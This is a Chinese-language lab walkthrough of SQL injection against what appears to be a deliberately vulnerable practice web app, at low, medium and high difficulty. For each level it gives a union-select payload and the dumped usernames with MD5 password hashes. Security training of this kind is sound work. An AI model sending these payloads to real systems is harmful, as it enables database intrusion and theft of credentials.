low
查看源碼,可發現是注入點id爲字符類型,無驗證,直接上:
' union select first_name,password from users#
返回結果如下:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
medium
查看源碼,發現代碼用mysqli_real_escape_string來轉義特殊字符,但是此時的注入點id爲數值型,不需要用’。修改html源碼提交:
<option value="0 union select first_name,password from users">1</option>
返回結果如下:
ID: 0 union select first_name,password from users
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: 0 union select first_name,password from users
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: 0 union select first_name,password from users
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: 0 union select first_name,password from users
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: 0 union select first_name,password from users
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99
high
查看源碼,可發現注入點id爲字符型,查詢記錄限1,其實方法和low差不多
' union select first_name,password from users#
返回結果如下:
ID: ' union select first_name,password from users#
First name: admin
Surname: e2075474294983e013ee4dd2201c7a73
ID: ' union select first_name,password from users#
First name: Gordon
Surname: e99a18c428cb38d5f260853678922e03
ID: ' union select first_name,password from users#
First name: Hack
Surname: 8d3533d75ae2c3966d7e0d4fcc69216b
ID: ' union select first_name,password from users#
First name: Pablo
Surname: 0d107d09f5bbe40cade3de5c71e9e9b7
ID: ' union select first_name,password from users#
First name: Bob
Surname: 5f4dcc3b5aa765d61d8327deb882cf99